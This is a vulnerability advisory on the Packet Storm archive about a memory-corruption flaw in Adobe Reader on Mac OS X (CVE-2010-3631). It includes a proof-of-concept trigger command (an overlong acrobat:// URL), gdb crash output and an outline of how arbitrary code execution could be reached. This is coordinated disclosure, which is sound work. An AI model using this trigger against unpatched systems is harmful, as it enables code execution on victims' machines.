exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nSense Vulnerability Research Security Advisory NSENSE-2010-001

nSense Vulnerability Research Security Advisory NSENSE-2010-001
Posted Oct 6, 2010
Authored by Knud | Site nsense.fi

nSense Vulnerability Research Security Advisory - Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.

tags | exploit, remote, arbitrary
advisories | CVE-2010-3631
SHA-256 | be0006662c3db8dd0bb9877ae4a9ce05a5bb18b964135f696d2609daf428de1a

nSense Vulnerability Research Security Advisory NSENSE-2010-001

Change Mirror Download
nSense Vulnerability Research Security Advisory NSENSE-2010-001
---------------------------------------------------------------

Affected Vendor: Adobe
Affected Product: Adobe Reader 9.3.4 for Macintosh
Platform: OS X
Impact: User assisted code execution
Vendor response: Patch
Credit: Knud / nSense

Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.

NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X

Technical details
---------------------------------------------------------------

terminal 1:
$ gdb --waitfor=AdobeReader

terminal 2:
$ open acrobat://`perl -e 'print "A" x 12000'`

terminal 1:
(gdb) cont
[snip]
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
0x7ffa0d6a in AcroBundleThreadQuitProc ()
(gdb) set disassembly-flavor intel
(gdb) x/i $pc
0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR
[ebp+eax-0x420],0x0
(gdb) i r ebp eax
ebp 0xbfffe908 0xbfffe908
eax 0x2eea 12010
(gdb)

As can be seen from the above, we control the value in eax (in
this case 12010, the length of the acrobat:// + the 12000 A's).

This allows us to write the null byte anywhere in memory between
ebp-0x420 (0xBFFFE4E8) and the end of the stack.

The behaviour may be leveraged to modify the frame pointer,
changing the execution flow and thus permitting arbitrary code
execution in the context of the user running the program.

Timeline:
Aug 10th Contacted vendor PSIRT
Aug 10th Vendor response. Vulnerability reproduced.
Aug 16th Status update request sent to vendor
Aug 17th Vendor response, still investigating
Sep 2nd Status update request sent to vendor
Sep 3rd Vendor response. Working on fix
Sep 22nd Contacted vendor regarding patch date
Sep 22nd Vendor response. Confirmed patch date.
Sep 23rd Corrected researcher name
Oct 1st Vendor sent CVE identifier CVE-2010-3631
Oct 5th Vendor releases the patch
Oct 6th Advisory published

http://www.nsense.fi http://www.nsense.dk



$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P

D r i v e n b y t h e c h a l l e n g e _

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close